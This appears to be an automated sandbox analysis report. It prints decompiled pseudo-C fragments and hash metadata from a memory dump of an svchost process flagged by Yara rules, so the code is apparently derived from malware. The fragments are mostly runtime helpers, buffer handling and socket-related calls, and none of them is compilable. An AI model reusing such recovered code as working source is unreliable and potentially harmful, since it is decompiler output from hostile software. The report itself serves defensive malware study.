                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x148)) + 0x14)) =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				 *((intOrPtr*)(_t76 + 0x2c)) = _t40;
                                                            				_v40 = E0000022B22BAF544D80;
                                                            				 *((char*)(_t76 + 0x18)) = 1;
                                                            				_v32 = _t76;
                                                            				_v24 = 1;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v16 = E0000022B22BAF544D80;
                                                            				_v48 = E0000022B22BAF544D80;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, E0000022B22BAF544D80, _t66, _t63, _t77, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				_t39 = CloseHandle(??);
                                                            				 *((long long*)(_t76 + 0x30)) = E0000022B22BAF544D80;
                                                            				return _t39;
                                                            			}















                                                            0x22baf544830
                                                            0x22baf544830
                                                            0x22baf54483a
                                                            0x22baf54483c
                                                            0x22baf544840
                                                            0x22baf54484a
                                                            0x22baf544854
                                                            0x22baf54485a
                                                            0x22baf544864
                                                            0x22baf544866
                                                            0x22baf54486e
                                                            0x22baf544875
                                                            0x22baf54487d
                                                            0x22baf54487f
                                                            0x22baf544885
                                                            0x22baf54488a
                                                            0x22baf54488c
                                                            0x22baf544892
                                                            0x22baf544894
                                                            0x22baf54489c
                                                            0x22baf5448aa
                                                            0x22baf5448b1
                                                            0x22baf5448bd
                                                            0x22baf5448c7
                                                            0x22baf5448ca
                                                            0x22baf5448cf
                                                            0x22baf5448cf
                                                            0x22baf5448d9
                                                            0x22baf5448de
                                                            0x22baf5448e3
                                                            0x22baf5448e7
                                                            0x22baf5448ec
                                                            0x22baf5448f1
                                                            0x22baf5448f7
                                                            0x22baf54490e
                                                            0x22baf544913
                                                            0x22baf544917
                                                            0x22baf544927
                                                            0x22baf544932
                                                            0x22baf544938
                                                            0x22baf544946

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait$CreateEvent
                                                            • String ID:
                                                            • API String ID: 3556256739-0
                                                            • Opcode ID: 9602e55794e0dfdb957543a6eb7ea68636045d1d9e1d5116c6500b7e41b68299
                                                            • Instruction ID: 2ca875b1a11f12b2a5f4af9d8a5beea0b3ea0b846d38eecad6d8a3e30c40c4c7
                                                            • Opcode Fuzzy Hash: 9602e55794e0dfdb957543a6eb7ea68636045d1d9e1d5116c6500b7e41b68299
                                                            • Instruction Fuzzy Hash: AF31C133604B80A6EB65CF65E49C39E73A2F788B50F144125DB4E47B6ACF3AC460CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF534033(signed char __ecx, signed long long __r14, long long _a32, long long* _a96, long long _a104, signed long long _a112, void* _a120) {
                                                            				void* _t20;
                                                            				signed char _t21;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				long long* _t43;
                                                            				long long _t47;
                                                            				void* _t48;
                                                            				long long _t52;
                                                            				long long _t54;
                                                            				signed long long _t63;
                                                            
                                                            				_t21 = __ecx;
                                                            				r14d = 0;
                                                            				_t43 = _a96;
                                                            				_t63 = _a112;
                                                            				_t52 = _a104;
                                                            				_t54 = _a32;
                                                            				if (_t63 == 0) goto 0xaf534079;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf534065;
                                                            				goto 0xaf534068;
                                                            				if (_t63 == 0) goto 0xaf534079;
                                                            				_t20 = E0000022B22BAF562BA0(__ecx, _t22, _t23, _t24, _t54, _t43, _t52, _t54, _t63 + _t63);
                                                            				_t37 =  *((intOrPtr*)(_t43 + 0x18));
                                                            				if (_t37 - 8 < 0) goto 0xaf5340dc;
                                                            				_t38 = _t37 + 1;
                                                            				_t47 =  *_t43;
                                                            				if (_t38 - 0xffffffff <= 0) goto 0xaf534094;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t38 + _t38 - 0x1000 < 0) goto 0xaf5340d7;
                                                            				if ((_t21 & 0x0000001f) == 0) goto 0xaf5340aa;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t40 =  *((intOrPtr*)(_t47 - 8));
                                                            				if (_t40 - _t47 < 0) goto 0xaf5340b9;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t48 = _t47 - _t40;
                                                            				if (_t48 - 8 >= 0) goto 0xaf5340c8;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t48 - 0x27 <= 0) goto 0xaf5340d4;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t43 + 0x18)) = 7;
                                                            				 *(_t43 + 0x10) = __r14;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf5340f4;
                                                            				goto 0xaf5340f7;
                                                            				 *_t43 = r14w;
                                                            				 *_t43 = _t54;
                                                            				 *((long long*)(_t43 + 0x18)) = _t52;
                                                            				 *(_t43 + 0x10) = _t63;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf534110;
                                                            				 *((intOrPtr*)(_t54 + _t63 * 2)) = r14w;
                                                            				return _t20;
                                                            			}

















                                                            0x22baf534033
                                                            0x22baf534033
                                                            0x22baf534040
                                                            0x22baf534045
                                                            0x22baf53404a
                                                            0x22baf53404f
                                                            0x22baf534057
                                                            0x22baf53405e
                                                            0x22baf534063
                                                            0x22baf53406b
                                                            0x22baf534074
                                                            0x22baf534079
                                                            0x22baf534081
                                                            0x22baf534083
                                                            0x22baf534086
                                                            0x22baf53408c
                                                            0x22baf53408e
                                                            0x22baf534093
                                                            0x22baf53409d
                                                            0x22baf5340a2
                                                            0x22baf5340a4
                                                            0x22baf5340a9
                                                            0x22baf5340aa
                                                            0x22baf5340b1
                                                            0x22baf5340b3
                                                            0x22baf5340b8
                                                            0x22baf5340b9
                                                            0x22baf5340c0
                                                            0x22baf5340c2
                                                            0x22baf5340c7
                                                            0x22baf5340cc
                                                            0x22baf5340ce
                                                            0x22baf5340d3
                                                            0x22baf5340d7
                                                            0x22baf5340dc
                                                            0x22baf5340e4
                                                            0x22baf5340ed
                                                            0x22baf5340f2
                                                            0x22baf5340f7
                                                            0x22baf5340fb
                                                            0x22baf5340fe
                                                            0x22baf534102
                                                            0x22baf53410b
                                                            0x22baf534110
                                                            0x22baf534126

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: a55318281355751048e654ec6c90e4f60892887427f657d0e125a8b9e8dc6663
                                                            • Instruction ID: f7ee1c7b9edc606a944283dfc40b4e7a00407a5dfde883763964693ca61f07d0
                                                            • Opcode Fuzzy Hash: a55318281355751048e654ec6c90e4f60892887427f657d0e125a8b9e8dc6663
                                                            • Instruction Fuzzy Hash: 3A218E27314B4491EB7AAFE9D06D3DD3790E740B94F140B158B690B7DBCF3AC4A18281
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeavesend
                                                            • String ID:
                                                            • API String ID: 421069059-0
                                                            • Opcode ID: d810bfc3613e10ac28bb07b8fb333ee80c8520b6d9246e445967c01a5f6fe600
                                                            • Instruction ID: b414d6d6b24b274a8e302700bb12d785c0fbe6cdb38b607204e6c3c0f3fe20ee
                                                            • Opcode Fuzzy Hash: d810bfc3613e10ac28bb07b8fb333ee80c8520b6d9246e445967c01a5f6fe600
                                                            • Instruction Fuzzy Hash: A3316B33214A54ABE771CF6AE58C69E77B0F348B90F501515DB8A83F56DF3AE4A08B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF533A80(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rsi, signed int __r8, long long _a8, long long _a16) {
                                                            				void* __rdi;
                                                            				void* _t17;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t34;
                                                            				intOrPtr _t36;
                                                            				intOrPtr* _t38;
                                                            				intOrPtr _t45;
                                                            				void* _t46;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t38 = __rcx;
                                                            				if (__edx == 0) goto 0xaf533afd;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf533afd;
                                                            				_t45 =  *__rcx;
                                                            				if (__r8 == 0) goto 0xaf533ab3;
                                                            				E0000022B22BAF562BA0(_t17, _t19, _t20, _t21, __rcx, _t45, _t45, __r8, __r8 + __r8);
                                                            				_t34 =  *((intOrPtr*)(_t38 + 0x18)) + 1;
                                                            				if (_t34 - 0xffffffff > 0) goto 0xaf533b29;
                                                            				if (_t34 + _t34 - 0x1000 < 0) goto 0xaf533af5;
                                                            				if ((dil & 0x0000001f) != 0) goto 0xaf533b2f;
                                                            				_t36 =  *((intOrPtr*)(_t45 - 8));
                                                            				if (_t36 - _t45 >= 0) goto 0xaf533b35;
                                                            				_t46 = _t45 - _t36;
                                                            				if (_t46 - 8 < 0) goto 0xaf533b3b;
                                                            				if (_t46 - 0x27 > 0) goto 0xaf533b41;
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t38 + 0x18)) = 7;
                                                            				 *((long long*)(_t38 + 0x10)) = __r8;
                                                            				if ( *((long long*)(_t38 + 0x18)) - 8 < 0) goto 0xaf533b13;
                                                            				 *((short*)( *_t38 + __r8 * 2)) = 0;
                                                            				return 0;
                                                            			}













                                                            0x22baf533a80
                                                            0x22baf533a85
                                                            0x22baf533a92
                                                            0x22baf533a97
                                                            0x22baf533a9e
                                                            0x22baf533aa0
                                                            0x22baf533aa6
                                                            0x22baf533aae
                                                            0x22baf533ac1
                                                            0x22baf533ac7
                                                            0x22baf533ad2
                                                            0x22baf533ad8
                                                            0x22baf533ada
                                                            0x22baf533ae1
                                                            0x22baf533ae3
                                                            0x22baf533aea
                                                            0x22baf533af0
                                                            0x22baf533af8
                                                            0x22baf533afd
                                                            0x22baf533b0a
                                                            0x22baf533b0e
                                                            0x22baf533b15
                                                            0x22baf533b28

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 01b01b3f11007f69d318a6b4b511b8171e13481f50d852a07ce971f895833366
                                                            • Instruction ID: c905a28660ce264c4aa4c1c0cb88c0a070cd3d059e7d1a150d192b9b9ea2b8f2
                                                            • Opcode Fuzzy Hash: 01b01b3f11007f69d318a6b4b511b8171e13481f50d852a07ce971f895833366
                                                            • Instruction Fuzzy Hash: 1C11D02371034861FA7AABE9D1AE3DD3351E704BE0F281B109AA903BCBDF76C4904381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF551AC0(long long __rbx, void* __rcx, long long _a8) {
                                                            				void* _t4;
                                                            				void* _t12;
                                                            
                                                            				_a8 = __rbx;
                                                            				GetCurrentThreadId();
                                                            				_t4 = E0000022B22BAF550C20(__rcx, __rcx, _t12);
                                                            				if (_t4 != 0) goto 0xaf551aec;
                                                            				return _t4;
                                                            			}





                                                            0x22baf551ac0
                                                            0x22baf551acd
                                                            0x22baf551ad8
                                                            0x22baf551adf
                                                            0x22baf551aeb

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Thread$CloseCurrentEventSwitchclosesocketsendshutdown
                                                            • String ID:
                                                            • API String ID: 2870165021-0
                                                            • Opcode ID: acfcbb5f787d251adaf38a9cca9f19412a7264b3d5163f623e0271512663ae76
                                                            • Instruction ID: 83b798d9270ccb17a09b5d186515dd3061d3f8ff8879e6d346aa31637b820d8f
                                                            • Opcode Fuzzy Hash: acfcbb5f787d251adaf38a9cca9f19412a7264b3d5163f623e0271512663ae76
                                                            • Instruction Fuzzy Hash: 69216073600A0192EB269FB6E45C29C37B0F788FA4F555321CA2A477EADF35C885C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0000022B22BAF57788C(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				signed int _t27;
                                                            				signed int _t28;
                                                            				signed int _t29;
                                                            				signed int _t30;
                                                            				signed int _t31;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t45;
                                                            				signed int _t47;
                                                            				void* _t52;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t27 = __ecx & 0x0000001f;
                                                            				if ((__ecx & 0x00000008) == 0) goto 0xaf5778bd;
                                                            				if (__edx >= 0) goto 0xaf5778bd;
                                                            				E0000022B22BAF578010(_t27, _t52);
                                                            				_t28 = _t27 & 0xfffffff7;
                                                            				goto 0xaf577914;
                                                            				_t43 = 0x00000004 & dil;
                                                            				if (_t43 == 0) goto 0xaf5778d8;
                                                            				asm("dec eax");
                                                            				if (_t43 >= 0) goto 0xaf5778d8;
                                                            				E0000022B22BAF578010(_t28, _t52);
                                                            				_t29 = _t28 & 0xfffffffb;
                                                            				goto 0xaf577914;
                                                            				_t44 = dil & 0x00000001;
                                                            				if (_t44 == 0) goto 0xaf5778f4;
                                                            				asm("dec eax");
                                                            				if (_t44 >= 0) goto 0xaf5778f4;
                                                            				E0000022B22BAF578010(_t29, _t52);
                                                            				_t30 = _t29 & 0xfffffffe;
                                                            				goto 0xaf577914;
                                                            				_t45 = dil & 0x00000002;
                                                            				if (_t45 == 0) goto 0xaf577914;
                                                            				asm("dec eax");
                                                            				if (_t45 >= 0) goto 0xaf577914;
                                                            				if ((dil & 0x00000010) == 0) goto 0xaf577911;
                                                            				E0000022B22BAF578010(_t30, _t52);
                                                            				_t31 = _t30 & 0xfffffffd;
                                                            				_t47 = dil & 0x00000010;
                                                            				if (_t47 == 0) goto 0xaf57792e;
                                                            				asm("dec eax");
                                                            				if (_t47 >= 0) goto 0xaf57792e;
                                                            				E0000022B22BAF578010(_t31, _t52);
                                                            				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                            			}













                                                            0x22baf57788c
                                                            0x22baf577891
                                                            0x22baf5778a0
                                                            0x22baf5778a8
                                                            0x22baf5778ac
                                                            0x22baf5778b3
                                                            0x22baf5778b8
                                                            0x22baf5778bb
                                                            0x22baf5778c2
                                                            0x22baf5778c5
                                                            0x22baf5778c7
                                                            0x22baf5778cc
                                                            0x22baf5778ce
                                                            0x22baf5778d3
                                                            0x22baf5778d6
                                                            0x22baf5778d8
                                                            0x22baf5778dc
                                                            0x22baf5778de
                                                            0x22baf5778e3
                                                            0x22baf5778ea
                                                            0x22baf5778ef
                                                            0x22baf5778f2
                                                            0x22baf5778f4
                                                            0x22baf5778f8
                                                            0x22baf5778fa
                                                            0x22baf5778ff
                                                            0x22baf577905
                                                            0x22baf57790c
                                                            0x22baf577911
                                                            0x22baf577914
                                                            0x22baf577918
                                                            0x22baf57791a
                                                            0x22baf57791f
                                                            0x22baf577926
                                                            0x22baf577944

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                            • Instruction ID: f4cb4fe58d665fce273cc7466ccb026525dcd7911c1c366c127e20d118f1c0c2
                                                            • Opcode Fuzzy Hash: 5775c5d13c4e64004754ee0314eb150a4182c69c28ee82591c9a2c52d77396f5
                                                            • Instruction Fuzzy Hash: F0110C77A2060127FF7A11E8F48E3F93B417B5A3F0F294E64A9B6066E7DF1A84409211
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: setsockopt$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1564866530-0
                                                            • Opcode ID: 648e4d95653bdd450a4785caf3a97a83d97195326a6c88ef1a596a3f2b6fddef
                                                            • Instruction ID: 651f81d705d15870a6af0d74be6c09fc1beac695a07ff528573674905b82f8b4
                                                            • Opcode Fuzzy Hash: 648e4d95653bdd450a4785caf3a97a83d97195326a6c88ef1a596a3f2b6fddef
                                                            • Instruction Fuzzy Hash: FF214F72214A86E6FB718FA0E55C39A77A1FB84754F500625FB8A06ADACF3EC5048B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 89c8223d4217928e17653a7c4d546915ced36afa6922e5df3d775de8e12a9e46
                                                            • Instruction ID: 85053fa779f54081f723727c89e67c844f16f0cd5be2ac4dd532e1ef531f5156
                                                            • Opcode Fuzzy Hash: 89c8223d4217928e17653a7c4d546915ced36afa6922e5df3d775de8e12a9e46
                                                            • Instruction Fuzzy Hash: C6015A23721749A1FE7AA6E9D06D3ED33919704BA4F241B148A7D467D3EF6AC4C14280
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E0000022B22BAF540000(int __ebx, void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, void* __r9, void* __r14, void* __r15, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rsi;
                                                            				int _t15;
                                                            				int _t18;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				char* _t28;
                                                            				long long _t45;
                                                            				void* _t53;
                                                            
                                                            				_t53 = __r8;
                                                            				_t28 = __rax;
                                                            				_t18 = __ebx;
                                                            				_a24 = __rbp;
                                                            				E0000022B22BAF53F750(_t45, __r9, __r14, __r15);
                                                            				if (_t28 == 0) goto 0xaf54008a;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rdi;
                                                            				LocalSize(??);
                                                            				LocalAlloc(??, ??);
                                                            				r8d = _t18;
                                                            				_t5 = _t28 + 1; // 0x1
                                                            				 *_t28 = 0x8e;
                                                            				E0000022B22BAF562BA0(0x40, _t23, _t24, _t25, _t5, _t28, _t28, _t28, _t53);
                                                            				LocalFree(??);
                                                            				_t15 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t15;
                                                            				E0000022B22BAF531FF0(_a8, _t28);
                                                            				return LocalFree(??);
                                                            			}












                                                            0x22baf540000
                                                            0x22baf540000
                                                            0x22baf540000
                                                            0x22baf540000
                                                            0x22baf54000d
                                                            0x22baf540018
                                                            0x22baf54001a
                                                            0x22baf540022
                                                            0x22baf540027
                                                            0x22baf540038
                                                            0x22baf54003e
                                                            0x22baf540047
                                                            0x22baf54004b
                                                            0x22baf54004e
                                                            0x22baf540056
                                                            0x22baf54005f
                                                            0x22baf540069
                                                            0x22baf54006c
                                                            0x22baf540072
                                                            0x22baf540094

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: 8783259af32ba0c14d0cf9032549750ec9e1864db2890626efa726ac833c9638
                                                            • Instruction ID: 6af906d92bf711cc6a0aee0da1735f6ef7f2bd6c1c094b51abf7280552b0a2d1
                                                            • Opcode Fuzzy Hash: 8783259af32ba0c14d0cf9032549750ec9e1864db2890626efa726ac833c9638
                                                            • Instruction Fuzzy Hash: EA017526215A40A2EE11AF96E45C2EEB7A1EB89FD0F084514DF4907B5BDF3EC0458780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0000022B22BAF5400A0(int __ebx, void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rbp, void* __r8, void* __r9, void* __r14, void* __r15, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rsi;
                                                            				int _t15;
                                                            				int _t18;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				char* _t28;
                                                            				long long _t29;
                                                            				long long _t45;
                                                            				void* _t53;
                                                            
                                                            				_t53 = __r8;
                                                            				_t29 = __rbx;
                                                            				_t28 = __rax;
                                                            				_t18 = __ebx;
                                                            				_a24 = __rbp;
                                                            				E0000022B22BAF53FC50(__rbx, _t45, __r9, __r14, __r15);
                                                            				if (_t28 == 0) goto 0xaf54012a;
                                                            				_a8 = _t29;
                                                            				_a16 = __rdi;
                                                            				LocalSize(??);
                                                            				LocalAlloc(??, ??);
                                                            				r8d = _t18;
                                                            				_t5 = _t28 + 1; // 0x1
                                                            				 *_t28 = 0x8e;
                                                            				E0000022B22BAF562BA0(0x40, _t23, _t24, _t25, _t5, _t28, _t28, _t28, _t53);
                                                            				LocalFree(??);
                                                            				_t15 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t15;
                                                            				E0000022B22BAF531FF0(_a8, _t28);
                                                            				return LocalFree(??);
                                                            			}













                                                            0x22baf5400a0
                                                            0x22baf5400a0
                                                            0x22baf5400a0
                                                            0x22baf5400a0
                                                            0x22baf5400a0
                                                            0x22baf5400ad
                                                            0x22baf5400b8
                                                            0x22baf5400ba
                                                            0x22baf5400c2
                                                            0x22baf5400c7
                                                            0x22baf5400d8
                                                            0x22baf5400de
                                                            0x22baf5400e7
                                                            0x22baf5400eb
                                                            0x22baf5400ee
                                                            0x22baf5400f6
                                                            0x22baf5400ff
                                                            0x22baf540109
                                                            0x22baf54010c
                                                            0x22baf540112
                                                            0x22baf540134

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: 616f164c407fe861dd4db3285f6b11ddd2fe77cb04e9f0e82758d3ec9b6edb57
                                                            • Instruction ID: fc2b210dd981c1046cf8dcddd2d1690dbf223f31c8e05a00ff5c198525705069
                                                            • Opcode Fuzzy Hash: 616f164c407fe861dd4db3285f6b11ddd2fe77cb04e9f0e82758d3ec9b6edb57
                                                            • Instruction Fuzzy Hash: 73017526215A44A2EE11AF96E45C2EEB7A1EB89FD0F084514DF4907B5BDF3EC0468780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                            • String ID:
                                                            • API String ID: 2068333509-0
                                                            • Opcode ID: 78de20b501988cc7dda47b26bd3e50bf554e57992cdc6d61acfbe56b35ce1513
                                                            • Instruction ID: ac9302e19ae31ee5290d78da8bd957d49370e09dd097b031535d308d4651d5cd
                                                            • Opcode Fuzzy Hash: 78de20b501988cc7dda47b26bd3e50bf554e57992cdc6d61acfbe56b35ce1513
                                                            • Instruction Fuzzy Hash: 0F014432715B40A2EF769BA1F85D7EA73A0F78CB81F440421DA5A47756DF3DC0558740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF542B60(signed int __edx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, signed int __r8, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t30;
                                                            				intOrPtr* _t41;
                                                            				long long* _t42;
                                                            				intOrPtr* _t47;
                                                            				intOrPtr* _t48;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            				intOrPtr* _t60;
                                                            
                                                            				if (__r8 - 0xffffffff > 0) goto 0xaf542baf;
                                                            				if (__r8 * 8 - 0x1000 < 0) goto 0xaf542ba3;
                                                            				if ((__edx & 0x0000001f) != 0) goto 0xaf542bb5;
                                                            				_t41 =  *((intOrPtr*)(__rdx - 8));
                                                            				if (_t41 - __rdx >= 0) goto 0xaf542bbb;
                                                            				_t54 = __rdx - _t41;
                                                            				if (_t54 - 8 < 0) goto 0xaf542bc1;
                                                            				if (_t54 - 0x27 > 0) goto 0xaf542bc7;
                                                            				_t55 = _t41;
                                                            				_t47 = _t41;
                                                            				goto 0xaf55a85c;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_a16 = __rbp;
                                                            				_a24 = __rsi;
                                                            				_t57 = _t47 + 0x128;
                                                            				_t42 =  *((intOrPtr*)(_t57 + 8));
                                                            				_t60 = _t47;
                                                            				_t48 =  *_t42;
                                                            				 *_t42 = _t42;
                                                            				 *((long long*)( *((intOrPtr*)(_t57 + 8)) + 8)) =  *((intOrPtr*)(_t57 + 8));
                                                            				 *((long long*)(_t57 + 0x10)) = __rbp;
                                                            				if (_t48 ==  *((intOrPtr*)(_t57 + 8))) goto 0xaf542c26;
                                                            				_a8 = __rbx;
                                                            				0xaf55a85c(_t56);
                                                            				if ( *_t48 !=  *((intOrPtr*)(_t57 + 8))) goto 0xaf542c10;
                                                            				0xaf542cf0();
                                                            				E0000022B22BAF564114(_t26, 8, _t30, _a8, _t55, _t60, __r8);
                                                            				_t25 = E0000022B22BAF564114(_t26, 8, _t30, _a8, _t55, _t60, __r8);
                                                            				 *((long long*)(_t60 + 8)) = __rbp;
                                                            				 *((long long*)(_t60 + 0x48)) = __rbp;
                                                            				 *_t60 = 0;
                                                            				 *((intOrPtr*)(_t60 + 0xc8)) = 0;
                                                            				 *((intOrPtr*)(_t60 + 0x88)) = 0;
                                                            				return _t25;
                                                            			}














                                                            0x22baf542b71
                                                            0x22baf542b81
                                                            0x22baf542b86
                                                            0x22baf542b88
                                                            0x22baf542b8f
                                                            0x22baf542b91
                                                            0x22baf542b98
                                                            0x22baf542b9e
                                                            0x22baf542ba0
                                                            0x22baf542ba3
                                                            0x22baf542baa
                                                            0x22baf542baf
                                                            0x22baf542bb4
                                                            0x22baf542bb5
                                                            0x22baf542bba
                                                            0x22baf542bbb
                                                            0x22baf542bc0
                                                            0x22baf542bc1
                                                            0x22baf542bc6
                                                            0x22baf542bc7
                                                            0x22baf542bcc
